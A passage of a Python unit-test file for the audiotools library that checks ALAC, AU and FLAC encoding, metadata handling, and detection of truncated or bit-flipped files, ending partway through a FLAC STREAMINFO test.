temp_file = tempfile.NamedTemporaryFile(suffix=".alac")
self.audio_class.from_pcm(temp_file.name,
pcmreader,
block_size=block_size)
alac = audiotools.open(temp_file.name)
self.assert_(alac.total_frames() > 0)
#first, ensure the ALAC-encoded file
#has the same MD5 signature as pcmreader once decoded
md5sum_decoder = md5()
d = alac.to_pcm()
f = d.read(audiotools.FRAMELIST_SIZE)
while (len(f) > 0):
md5sum_decoder.update(f.to_bytes(False, True))
f = d.read(audiotools.FRAMELIST_SIZE)
d.close()
self.assertEqual(md5sum_decoder.digest(), pcmreader.digest())
def __stream_variations__(self):
for stream in [
test_streams.Sine16_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
test_streams.Sine16_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
test_streams.Sine16_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
test_streams.Sine16_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
test_streams.Sine24_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
test_streams.Sine24_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
test_streams.Sine24_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
test_streams.Sine24_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
test_streams.Sine24_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
test_streams.Sine24_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine24_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
test_streams.Sine24_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
test_streams.Sine24_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
test_streams.Sine24_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
test_streams.Sine24_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1)]:
yield stream
def __multichannel_stream_variations__(self):
for stream in [
test_streams.Simple_Sine(200000, 44100, 0x0007, 16,
(6400, 10000),
(12800, 20000),
(30720, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x0107, 16,
(6400, 10000),
(12800, 20000),
(19200, 30000),
(16640, 40000)),
test_streams.Simple_Sine(200000, 44100, 0x0037, 16,
(6400, 10000),
(8960, 15000),
(11520, 20000),
(12800, 25000),
(14080, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x003F, 16,
(6400, 10000),
(11520, 15000),
(16640, 20000),
(21760, 25000),
(26880, 30000),
(30720, 35000)),
test_streams.Simple_Sine(200000, 44100, 0x013F, 16,
(6400, 10000),
(11520, 15000),
(16640, 20000),
(21760, 25000),
(26880, 30000),
(30720, 35000),
(29000, 40000)),
test_streams.Simple_Sine(200000, 44100, 0x00FF, 16,
(6400, 10000),
(11520, 15000),
(16640, 20000),
(21760, 25000),
(26880, 30000),
(30720, 35000),
(29000, 40000),
(28000, 45000)),
test_streams.Simple_Sine(200000, 44100, 0x0007, 24,
(1638400, 10000),
(3276800, 20000),
(7864320, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x0107, 24,
(1638400, 10000),
(3276800, 20000),
(4915200, 30000),
(4259840, 40000)),
test_streams.Simple_Sine(200000, 44100, 0x0037, 24,
(1638400, 10000),
(2293760, 15000),
(2949120, 20000),
(3276800, 25000),
(3604480, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x003F, 24,
(1638400, 10000),
(2949120, 15000),
(4259840, 20000),
(5570560, 25000),
(6881280, 30000),
(7864320, 35000)),
test_streams.Simple_Sine(200000, 44100, 0x013F, 24,
(1638400, 10000),
(2949120, 15000),
(4259840, 20000),
(5570560, 25000),
(6881280, 30000),
(7864320, 35000),
(7000000, 40000)),
test_streams.Simple_Sine(200000, 44100, 0x00FF, 24,
(1638400, 10000),
(2949120, 15000),
(4259840, 20000),
(5570560, 25000),
(6881280, 30000),
(7864320, 35000),
(7000000, 40000),
(6000000, 45000))]:
yield stream
@FORMAT_ALAC
def test_streams(self):
for g in self.__stream_variations__():
md5sum = md5()
f = g.read(audiotools.FRAMELIST_SIZE)
while (len(f) > 0):
md5sum.update(f.to_bytes(False, True))
f = g.read(audiotools.FRAMELIST_SIZE)
self.assertEqual(md5sum.digest(), g.digest())
g.close()
for g in self.__multichannel_stream_variations__():
md5sum = md5()
f = g.read(audiotools.FRAMELIST_SIZE)
while (len(f) > 0):
md5sum.update(f.to_bytes(False, True))
f = g.read(audiotools.FRAMELIST_SIZE)
self.assertEqual(md5sum.digest(), g.digest())
g.close()
@FORMAT_ALAC
def test_small_files(self):
for g in [test_streams.Generate01,
test_streams.Generate02,
test_streams.Generate03,
test_streams.Generate04]:
self.__test_reader__(g(44100), block_size=1152)
@FORMAT_ALAC
def test_full_scale_deflection(self):
for (bps, fsd) in [(16, test_streams.fsd16),
(24, test_streams.fsd24)]:
for pattern in [test_streams.PATTERN01,
test_streams.PATTERN02,
test_streams.PATTERN03,
test_streams.PATTERN04,
test_streams.PATTERN05,
test_streams.PATTERN06,
test_streams.PATTERN07]:
self.__test_reader__(
test_streams.MD5Reader(fsd(pattern, 100)),
block_size=1152)
@FORMAT_ALAC
def test_sines(self):
for g in self.__stream_variations__():
self.__test_reader__(g, block_size=1152)
for g in self.__multichannel_stream_variations__():
self.__test_reader_nonalac__(g, block_size=1152)
@FORMAT_ALAC
def test_wasted_bps(self):
self.__test_reader__(test_streams.WastedBPS16(1000),
block_size=1152)
@FORMAT_ALAC
def test_blocksizes(self):
noise = struct.unpack(">32h", os.urandom(64))
for block_size in [16, 17, 18, 19, 20, 21, 22, 23, 24,
25, 26, 27, 28, 29, 30, 31, 32, 33]:
self.__test_reader__(test_streams.MD5Reader(
test_streams.FrameListReader(noise,
44100, 1, 16)),
block_size=block_size)
@FORMAT_ALAC
def test_noise(self):
for (channels, mask) in [
(1, audiotools.ChannelMask.from_channels(1)),
(2, audiotools.ChannelMask.from_channels(2))]:
for bps in [16, 24]:
#the reference decoder can't handle very large block sizes
for blocksize in [32, 4096, 8192]:
self.__test_reader__(
MD5_Reader(EXACT_RANDOM_PCM_Reader(
pcm_frames=65536,
sample_rate=44100,
channels=channels,
channel_mask=mask,
bits_per_sample=bps)),
block_size=blocksize)
@FORMAT_ALAC
def test_fractional(self):
def __perform_test__(block_size, pcm_frames):
self.__test_reader__(
MD5_Reader(EXACT_RANDOM_PCM_Reader(
pcm_frames=pcm_frames,
sample_rate=44100,
channels=2,
bits_per_sample=16)),
block_size=block_size)
for pcm_frames in [31, 32, 33, 34, 35, 2046, 2047, 2048, 2049, 2050]:
__perform_test__(33, pcm_frames)
for pcm_frames in [254, 255, 256, 257, 258, 510, 511, 512,
513, 514, 1022, 1023, 1024, 1025, 1026,
2046, 2047, 2048, 2049, 2050, 4094, 4095,
4096, 4097, 4098]:
__perform_test__(256, pcm_frames)
for pcm_frames in [1022, 1023, 1024, 1025, 1026, 2046, 2047,
2048, 2049, 2050, 4094, 4095, 4096, 4097, 4098]:
__perform_test__(2048, pcm_frames)
for pcm_frames in [1022, 1023, 1024, 1025, 1026, 2046, 2047, 2048,
2049, 2050, 4094, 4095, 4096, 4097, 4098, 4606,
4607, 4608, 4609, 4610, 8190, 8191, 8192, 8193,
8194, 16382, 16383, 16384, 16385, 16386]:
__perform_test__(4608, pcm_frames)
@FORMAT_ALAC
def test_frame_header_variations(self):
self.__test_reader__(test_streams.Sine16_Mono(200000, 96000,
441.0, 0.61, 661.5, 0.37),
block_size=16)
#The alac(1) decoder I'm using as a reference can't handle
#this block size, even though iTunes handles the resulting files
#just fine. Therefore, it's likely an alac bug beyond my
#capability to fix.
#I don't expect anyone will use anything other than the default
#block size anyway.
# self.__test_reader__(test_streams.Sine16_Mono(200000, 96000,
# 441.0, 0.61, 661.5, 0.37),
# block_size=65535)
self.__test_reader__(test_streams.Sine16_Mono(200000, 9,
441.0, 0.61, 661.5, 0.37),
block_size=1152)
self.__test_reader__(test_streams.Sine16_Mono(200000, 90,
441.0, 0.61, 661.5, 0.37),
block_size=1152)
self.__test_reader__(test_streams.Sine16_Mono(200000, 90000,
441.0, 0.61, 661.5, 0.37),
block_size=1152)
@FORMAT_ALAC
def test_python_codec(self):
def test_python_reader(pcmreader, block_size=4096):
#ALAC doesn't really have encoding options worth mentioning
from audiotools.py_encoders import encode_mdat
#encode file using Python-based encoder
temp_file = tempfile.NamedTemporaryFile(suffix=".m4a")
audiotools.ALACAudio.from_pcm(
temp_file.name,
pcmreader,
block_size=block_size,
encoding_function=encode_mdat)
#verify contents of file decoded by
#Python-based decoder against contents decoded by
#C-based decoder
from audiotools.py_decoders import ALACDecoder as ALACDecoder1
from audiotools.decoders import ALACDecoder as ALACDecoder2
self.assertEqual(audiotools.pcm_frame_cmp(
ALACDecoder1(temp_file.name),
ALACDecoder2(temp_file.name)), None)
temp_file.close()
#test small files
for g in [test_streams.Generate01,
test_streams.Generate02,
test_streams.Generate03,
test_streams.Generate04]:
test_python_reader(g(44100), block_size=1152)
#test full scale deflection
for (bps, fsd) in [(16, test_streams.fsd16),
(24, test_streams.fsd24)]:
for pattern in [test_streams.PATTERN01,
test_streams.PATTERN02,
test_streams.PATTERN03,
test_streams.PATTERN04,
test_streams.PATTERN05,
test_streams.PATTERN06,
test_streams.PATTERN07]:
test_python_reader(fsd(pattern, 100), block_size=1152)
#test sines
for g in [test_streams.Sine16_Mono(5000, 48000,
441.0, 0.50, 441.0, 0.49),
test_streams.Sine16_Mono(5000, 96000,
441.0, 0.61, 661.5, 0.37),
test_streams.Sine16_Stereo(5000, 48000,
441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine16_Stereo(5000, 96000,
441.0, 0.50, 882.0, 0.49, 1.0),
test_streams.Sine24_Mono(5000, 48000,
441.0, 0.50, 441.0, 0.49),
test_streams.Sine24_Mono(5000, 96000,
441.0, 0.61, 661.5, 0.37),
test_streams.Sine24_Stereo(5000, 48000,
441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine24_Stereo(5000, 96000,
441.0, 0.50, 882.0, 0.49, 1.0)]:
test_python_reader(g, block_size=1152)
for g in [test_streams.Simple_Sine(5000, 44100, 0x0007, 16,
(6400, 10000),
(12800, 20000),
(30720, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x0107, 16,
(6400, 10000),
(12800, 20000),
(19200, 30000),
(16640, 40000)),
test_streams.Simple_Sine(5000, 44100, 0x0037, 16,
(6400, 10000),
(8960, 15000),
(11520, 20000),
(12800, 25000),
(14080, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x003F, 16,
(6400, 10000),
(11520, 15000),
(16640, 20000),
(21760, 25000),
(26880, 30000),
(30720, 35000)),
test_streams.Simple_Sine(5000, 44100, 0x013F, 16,
(6400, 10000),
(11520, 15000),
(16640, 20000),
(21760, 25000),
(26880, 30000),
(30720, 35000),
(29000, 40000)),
test_streams.Simple_Sine(5000, 44100, 0x00FF, 16,
(6400, 10000),
(11520, 15000),
(16640, 20000),
(21760, 25000),
(26880, 30000),
(30720, 35000),
(29000, 40000),
(28000, 45000)),
test_streams.Simple_Sine(5000, 44100, 0x0007, 24,
(1638400, 10000),
(3276800, 20000),
(7864320, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x0107, 24,
(1638400, 10000),
(3276800, 20000),
(4915200, 30000),
(4259840, 40000)),
test_streams.Simple_Sine(5000, 44100, 0x0037, 24,
(1638400, 10000),
(2293760, 15000),
(2949120, 20000),
(3276800, 25000),
(3604480, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x003F, 24,
(1638400, 10000),
(2949120, 15000),
(4259840, 20000),
(5570560, 25000),
(6881280, 30000),
(7864320, 35000)),
test_streams.Simple_Sine(5000, 44100, 0x013F, 24,
(1638400, 10000),
(2949120, 15000),
(4259840, 20000),
(5570560, 25000),
(6881280, 30000),
(7864320, 35000),
(7000000, 40000)),
test_streams.Simple_Sine(5000, 44100, 0x00FF, 24,
(1638400, 10000),
(2949120, 15000),
(4259840, 20000),
(5570560, 25000),
(6881280, 30000),
(7864320, 35000),
(7000000, 40000),
(6000000, 45000))]:
test_python_reader(g, block_size=1152)
#test wasted BPS
test_python_reader(test_streams.WastedBPS16(1000),
block_size=1152)
#test block sizes
noise = struct.unpack(">32h", os.urandom(64))
for block_size in [16, 17, 18, 19, 20, 21, 22, 23, 24,
25, 26, 27, 28, 29, 30, 31, 32, 33]:
test_python_reader(test_streams.MD5Reader(
test_streams.FrameListReader(noise,
44100, 1, 16)),
block_size=block_size)
#test noise
for (channels, mask) in [
(1, audiotools.ChannelMask.from_channels(1)),
(2, audiotools.ChannelMask.from_channels(2))]:
for bps in [16, 24]:
#the reference decoder can't handle very large block sizes
for blocksize in [32, 4096, 8192]:
test_python_reader(
EXACT_RANDOM_PCM_Reader(
pcm_frames=4097,
sample_rate=44100,
channels=channels,
channel_mask=mask,
bits_per_sample=bps),
block_size=blocksize)
#test fractional
for (block_size,
pcm_frames) in [(33, [31, 32, 33, 34, 35, 2046,
2047, 2048, 2049, 2050]),
(256, [254, 255, 256, 257, 258, 510, 511, 512,
513, 514, 1022, 1023, 1024, 1025, 1026,
2046, 2047, 2048, 2049, 2050, 4094, 4095,
4096, 4097, 4098])]:
for frame_count in pcm_frames:
test_python_reader(EXACT_RANDOM_PCM_Reader(
pcm_frames=frame_count,
sample_rate=44100,
channels=2,
bits_per_sample=16),
block_size=block_size)
#test frame header variations
test_python_reader(
test_streams.Sine16_Mono(5000, 96000,
441.0, 0.61, 661.5, 0.37),
block_size=16)
test_python_reader(
test_streams.Sine16_Mono(5000, 9,
441.0, 0.61, 661.5, 0.37),
block_size=1152)
test_python_reader(
test_streams.Sine16_Mono(5000, 90,
441.0, 0.61, 661.5, 0.37),
block_size=1152)
test_python_reader(
test_streams.Sine16_Mono(5000, 90000,
441.0, 0.61, 661.5, 0.37),
block_size=1152)
class AUFileTest(LosslessFileTest):
def setUp(self):
self.audio_class = audiotools.AuAudio
self.suffix = "." + self.audio_class.SUFFIX
@FORMAT_AU
def test_channel_mask(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for mask in [["front_center"],
["front_left",
"front_right"]]:
cm = audiotools.ChannelMask.from_fields(**dict(
[(f, True) for f in mask]))
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, channels=len(cm), channel_mask=int(cm)))
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), cm)
track = audiotools.open(temp.name)
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), cm)
for mask in [["front_left",
"front_right",
"front_center"],
["front_left",
"front_right",
"back_left",
"back_right"],
["front_left",
"front_right",
"front_center",
"back_left",
"back_right"],
["front_left",
"front_right",
"front_center",
"low_frequency",
"back_left",
"back_right"]]:
cm = audiotools.ChannelMask.from_fields(**dict(
[(f, True) for f in mask]))
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, channels=len(cm), channel_mask=int(cm)))
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), 0)
track = audiotools.open(temp.name)
self.assertEqual(track.channels(), len(cm))
self.assertEqual(track.channel_mask(), 0)
finally:
temp.close()
@FORMAT_AU
def test_verify(self):
#test truncated file
temp = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
try:
track = self.audio_class.from_pcm(
temp.name,
BLANK_PCM_Reader(1))
good_data = open(temp.name, 'rb').read()
f = open(temp.name, 'wb')
f.write(good_data[0:-10])
f.close()
reader = track.to_pcm()
self.assertNotEqual(reader, None)
self.assertRaises(IOError,
audiotools.transfer_framelist_data,
reader, lambda x: x)
finally:
temp.close()
#test convert() error
temp = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
try:
track = self.audio_class.from_pcm(
temp.name,
BLANK_PCM_Reader(1))
good_data = open(temp.name, 'rb').read()
f = open(temp.name, 'wb')
f.write(good_data[0:-10])
f.close()
if (os.path.isfile("dummy.wav")):
os.unlink("dummy.wav")
self.assertEqual(os.path.isfile("dummy.wav"), False)
self.assertRaises(audiotools.EncodingError,
track.convert,
"dummy.wav",
audiotools.WaveAudio)
self.assertEqual(os.path.isfile("dummy.wav"), False)
finally:
temp.close()
class FlacFileTest(TestForeignAiffChunks,
TestForeignWaveChunks,
LosslessFileTest):
def setUp(self):
self.audio_class = audiotools.FlacAudio
self.suffix = "." + self.audio_class.SUFFIX
from audiotools.decoders import FlacDecoder
from audiotools.encoders import encode_flac
self.decoder = FlacDecoder
self.encode = encode_flac
self.encode_opts = [{"block_size":1152,
"max_lpc_order":0,
"min_residual_partition_order":0,
"max_residual_partition_order":3},
{"block_size":1152,
"max_lpc_order":0,
"adaptive_mid_side":True,
"min_residual_partition_order":0,
"max_residual_partition_order":3},
{"block_size":1152,
"max_lpc_order":0,
"exhaustive_model_search":True,
"min_residual_partition_order":0,
"max_residual_partition_order":3},
{"block_size":4096,
"max_lpc_order":6,
"min_residual_partition_order":0,
"max_residual_partition_order":4},
{"block_size":4096,
"max_lpc_order":8,
"adaptive_mid_side":True,
"min_residual_partition_order":0,
"max_residual_partition_order":4},
{"block_size":4096,
"max_lpc_order":8,
"mid_side":True,
"min_residual_partition_order":0,
"max_residual_partition_order":5},
{"block_size":4096,
"max_lpc_order":8,
"mid_side":True,
"min_residual_partition_order":0,
"max_residual_partition_order":6},
{"block_size":4096,
"max_lpc_order":8,
"mid_side":True,
"exhaustive_model_search":True,
"min_residual_partition_order":0,
"max_residual_partition_order":6},
{"block_size":4096,
"max_lpc_order":12,
"mid_side":True,
"exhaustive_model_search":True,
"min_residual_partition_order":0,
"max_residual_partition_order":6}]
@FORMAT_FLAC
def test_init(self):
#check missing file
self.assertRaises(audiotools.flac.InvalidFLAC,
audiotools.FlacAudio,
"/dev/null/foo")
#check invalid file
invalid_file = tempfile.NamedTemporaryFile(suffix=".flac")
try:
for c in "invalidstringxxx":
invalid_file.write(c)
invalid_file.flush()
self.assertRaises(audiotools.flac.InvalidFLAC,
audiotools.FlacAudio,
invalid_file.name)
finally:
invalid_file.close()
#check some decoder errors,
#mostly to ensure a failed init doesn't make Python explode
self.assertRaises(TypeError, self.decoder)
self.assertRaises(TypeError, self.decoder, None)
self.assertRaises(ValueError, self.decoder, "/dev/null", -1)
self.assertRaises(ValueError, self.decoder, "/dev/null", 0x3, -1)
@FORMAT_FLAC
def test_metadata2(self):
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
track = self.audio_class.from_pcm(temp.name,
BLANK_PCM_Reader(1))
#check that a non-cover image with a description round-trips
m = audiotools.MetaData()
m.add_image(audiotools.Image.new(
TEST_COVER1, u'Unicode \u3057\u3066\u307f\u308b', 1))
track.set_metadata(m)
new_track = audiotools.open(track.filename)
m2 = new_track.get_metadata()
self.assertEqual(m.images()[0], m2.images()[0])
orig_md5 = md5()
pcm = track.to_pcm()
audiotools.transfer_framelist_data(pcm, orig_md5.update)
pcm.close()
#add an image too large to fit into a FLAC metadata chunk
metadata = track.get_metadata()
metadata.add_image(
audiotools.Image.new(HUGE_BMP.decode('bz2'), u'', 0))
track.update_metadata(metadata)
#ensure that setting the metadata doesn't break the file
new_md5 = md5()
pcm = track.to_pcm()
audiotools.transfer_framelist_data(pcm, new_md5.update)
pcm.close()
self.assertEqual(orig_md5.hexdigest(),
new_md5.hexdigest())
#ensure that setting fresh oversized metadata
#doesn't break the file
metadata = audiotools.MetaData()
metadata.add_image(
audiotools.Image.new(HUGE_BMP.decode('bz2'), u'', 0))
track.set_metadata(metadata)
new_md5 = md5()
pcm = track.to_pcm()
audiotools.transfer_framelist_data(pcm, new_md5.update)
pcm.close()
self.assertEqual(orig_md5.hexdigest(),
new_md5.hexdigest())
#add a COMMENT block too large to fit into a FLAC metadata chunk
metadata = track.get_metadata()
metadata.comment = "QlpoOTFBWSZTWYmtEk8AgICBAKAAAAggADCAKRoBANIBAOLuSKcKEhE1okng".decode('base64').decode('bz2').decode('ascii')
track.update_metadata(metadata)
#ensure that setting the metadata doesn't break the file
new_md5 = md5()
pcm = track.to_pcm()
audiotools.transfer_framelist_data(pcm, new_md5.update)
pcm.close()
self.assertEqual(orig_md5.hexdigest(),
new_md5.hexdigest())
#ensure that setting fresh oversized metadata
#doesn't break the file
metadata = audiotools.MetaData(
comment="QlpoOTFBWSZTWYmtEk8AgICBAKAAAAggADCAKRoBANIBAOLuSKcKEhE1okng".decode('base64').decode('bz2').decode('ascii'))
track.set_metadata(metadata)
new_md5 = md5()
pcm = track.to_pcm()
audiotools.transfer_framelist_data(pcm, new_md5.update)
pcm.close()
self.assertEqual(orig_md5.hexdigest(),
new_md5.hexdigest())
track.set_metadata(audiotools.MetaData(track_name=u"Testing"))
#ensure that vendor_string isn't modified by setting metadata
metadata = track.get_metadata()
self.assert_(metadata is not None)
self.assertEqual(metadata.track_name, u"Testing")
self.assert_(
metadata.get_block(audiotools.flac.Flac_VORBISCOMMENT.BLOCK_ID)
is not None)
vorbis_comment = metadata.get_blocks(
audiotools.flac.Flac_VORBISCOMMENT.BLOCK_ID)
proper_vendor_string = vorbis_comment[0].vendor_string
vorbis_comment[0].vendor_string = u"Different String"
metadata.replace_blocks(audiotools.flac.Flac_VORBISCOMMENT.BLOCK_ID,
vorbis_comment)
track.set_metadata(metadata)
vendor_string = track.get_metadata().get_block(
audiotools.flac.Flac_VORBISCOMMENT.BLOCK_ID).vendor_string
self.assertEqual(vendor_string, proper_vendor_string)
#FIXME - ensure that channel mask isn't modified
#by setting metadata
finally:
temp.close()
@FORMAT_FLAC
def test_update_metadata(self):
#build a temporary file
temp = tempfile.NamedTemporaryFile(suffix=".flac")
try:
temp.write(open("flac-allframes.flac", "rb").read())
temp.flush()
flac_file = audiotools.open(temp.name)
#attempt to adjust its metadata with bogus side data fields
metadata = flac_file.get_metadata()
streaminfo = metadata.get_block(audiotools.flac.Flac_STREAMINFO.BLOCK_ID)
minimum_block_size = streaminfo.minimum_block_size
maximum_block_size = streaminfo.maximum_block_size
minimum_frame_size = streaminfo.minimum_frame_size
maximum_frame_size = streaminfo.maximum_frame_size
sample_rate = streaminfo.sample_rate
channels = streaminfo.channels
bits_per_sample = streaminfo.bits_per_sample
total_samples = streaminfo.total_samples
md5sum = streaminfo.md5sum
streaminfo.minimum_block_size = 1
streaminfo.maximum_block_size = 10
streaminfo.minimum_frame_size = 2
streaminfo.maximum_frame_size = 11
streaminfo.sample_rate = 96000
streaminfo.channels = 4
streaminfo.bits_per_sample = 24
streaminfo.total_samples = 96000
streaminfo.md5sum = chr(1) * 16
metadata.replace_blocks(audiotools.flac.Flac_STREAMINFO.BLOCK_ID,
[streaminfo])
#ensure that set_metadata() restores fields to original values
flac_file.set_metadata(metadata)
metadata = flac_file.get_metadata()
streaminfo = metadata.get_block(audiotools.flac.Flac_STREAMINFO.BLOCK_ID)
self.assertEqual(minimum_block_size,
streaminfo.minimum_block_size)
self.assertEqual(maximum_block_size,
streaminfo.maximum_block_size)
self.assertEqual(minimum_frame_size,
streaminfo.minimum_frame_size)
self.assertEqual(maximum_frame_size,
streaminfo.maximum_frame_size)
self.assertEqual(sample_rate,
streaminfo.sample_rate)
self.assertEqual(channels,
streaminfo.channels)
self.assertEqual(bits_per_sample,
streaminfo.bits_per_sample)
self.assertEqual(total_samples,
streaminfo.total_samples)
self.assertEqual(md5sum,
streaminfo.md5sum)
#adjust its metadata with new bogus side data files
metadata = flac_file.get_metadata()
streaminfo = metadata.get_block(audiotools.flac.Flac_STREAMINFO.BLOCK_ID)
streaminfo.minimum_block_size = 1
streaminfo.maximum_block_size = 10
streaminfo.minimum_frame_size = 2
streaminfo.maximum_frame_size = 11
streaminfo.sample_rate = 96000
streaminfo.channels = 4
streaminfo.bits_per_sample = 24
streaminfo.total_samples = 96000
streaminfo.md5sum = chr(1) * 16
metadata.replace_blocks(audiotools.flac.Flac_STREAMINFO.BLOCK_ID,
[streaminfo])
#ensure that update_metadata() uses the bogus side data
flac_file.update_metadata(metadata)
metadata = flac_file.get_metadata()
streaminfo = metadata.get_block(audiotools.flac.Flac_STREAMINFO.BLOCK_ID)
self.assertEqual(streaminfo.minimum_block_size, 1)
self.assertEqual(streaminfo.maximum_block_size, 10)
self.assertEqual(streaminfo.minimum_frame_size, 2)
self.assertEqual(streaminfo.maximum_frame_size, 11)
self.assertEqual(streaminfo.sample_rate, 96000)
self.assertEqual(streaminfo.channels, 4)
self.assertEqual(streaminfo.bits_per_sample, 24)
self.assertEqual(streaminfo.total_samples, 96000)
self.assertEqual(streaminfo.md5sum, chr(1) * 16)
finally:
temp.close()
@FORMAT_FLAC
def test_verify(self):
self.assertEqual(audiotools.open("flac-allframes.flac").__md5__,
'f53f86876dcd7783225c93ba8a938c7d'.decode('hex'))
flac_data = open("flac-allframes.flac", "rb").read()
self.assertEqual(audiotools.open("flac-allframes.flac").verify(),
True)
#try changing the file underfoot
temp = tempfile.NamedTemporaryFile(suffix=".flac")
try:
temp.write(flac_data)
temp.flush()
flac_file = audiotools.open(temp.name)
self.assertEqual(flac_file.verify(), True)
for i in xrange(0, len(flac_data)):
f = open(temp.name, "wb")
f.write(flac_data[0:i])
f.close()
self.assertRaises(audiotools.InvalidFile,
flac_file.verify)
for i in xrange(0x2A, len(flac_data)):
for j in xrange(8):
new_data = list(flac_data)
new_data[i] = chr(ord(new_data[i]) ^ (1 << j))
f = open(temp.name, "wb")
f.write("".join(new_data))
f.close()
self.assertRaises(audiotools.InvalidFile,
flac_file.verify)
finally:
temp.close()
#check a FLAC file with a short header
temp = tempfile.NamedTemporaryFile(suffix=".flac")
try:
for i in xrange(0, 0x2A):
temp.seek(0, 0)
temp.write(flac_data[0:i])
temp.flush()
self.assertEqual(os.path.getsize(temp.name), i)
if (i < 4):
self.assertEqual(
audiotools.file_type(open(temp.name, "rb")),
None)
self.assertRaises(IOError,
audiotools.decoders.FlacDecoder,
temp.name, 1)
finally:
temp.close()
#check a FLAC file that's been truncated
temp = tempfile.NamedTemporaryFile(suffix=".flac")
try:
for i in xrange(0x2A, len(flac_data)):
temp.seek(0, 0)
temp.write(flac_data[0:i])
temp.flush()
self.assertEqual(os.path.getsize(temp.name), i)
decoder = audiotools.open(temp.name).to_pcm()
self.assertNotEqual(decoder, None)
self.assertRaises(IOError,
audiotools.transfer_framelist_data,
decoder, lambda x: x)
self.assertRaises(audiotools.InvalidFile,
audiotools.open(temp.name).verify)
finally:
temp.close()
#test a FLAC file with a single swapped bit
temp = tempfile.NamedTemporaryFile(suffix=".flac")
try:
for i in xrange(0x2A, len(flac_data)):
for j in xrange(8):
bytes = map(ord, flac_data[:])
bytes[i] ^= (1 << j)
temp.seek(0, 0)
temp.write("".join(map(chr, bytes)))
temp.flush()
self.assertEqual(len(flac_data),
os.path.getsize(temp.name))
decoders = audiotools.open(temp.name).to_pcm()
try:
self.assertRaises(ValueError,
audiotools.transfer_framelist_data,
decoders, lambda x: x)
except IOError:
#Randomly swapping bits may send the decoder
#off the end of the stream before triggering
#a CRC-16 error.
#We simply need to catch that case and continue on.
continue
finally:
temp.close()
#test a FLAC file with an invalid STREAMINFO block
mismatch_streaminfos = [
(4096, 4096, 12, 12, 44101, 0, 15, 80,
'\xf5?\x86\x87m\xcdw\x83"\\\x93\xba\x8a\x93\x8c}'),
(4096, 4096, 12, 12, 44100, 1, 15, 80,
'\xf5?\x86\x87m\xcdw\x83"\\\x93\xba\x8a\x93\x8c}'),
(4096, 4096, 12, 12, 44100, 0, 7, 80,
'\xf5?\x86\x87m\xcdw\x83"\\\x93\xba\x8a\x93\x8c}'),
(4096, 1, 12, 12, 44100, 0, 15, 80,
'\xf5?\x86\x87m\xcdw\x83"\\\x93\xba\x8a\x93\x8c}'),
(4096, 4096, 12, 12, 44100, 0, 15, 80,
'\xf5?\x86\x87m\xcdw\x83"\\\x93\xba\x8a\x93\x8d}')]
header = flac_data[0:8]
data = flac_data[0x2A:]
from audiotools.bitstream import BitstreamWriter
for streaminfo in mismatch_streaminfos:
temp = tempfile.NamedTemporaryFile(suffix=".flac")
try:
temp.seek(0, 0)
temp.write(header)
BitstreamWriter(temp.file, 0).build(
"16u 16u 24u 24u 20u 3u 5u 36U 16b",
streaminfo)
temp.write(data)
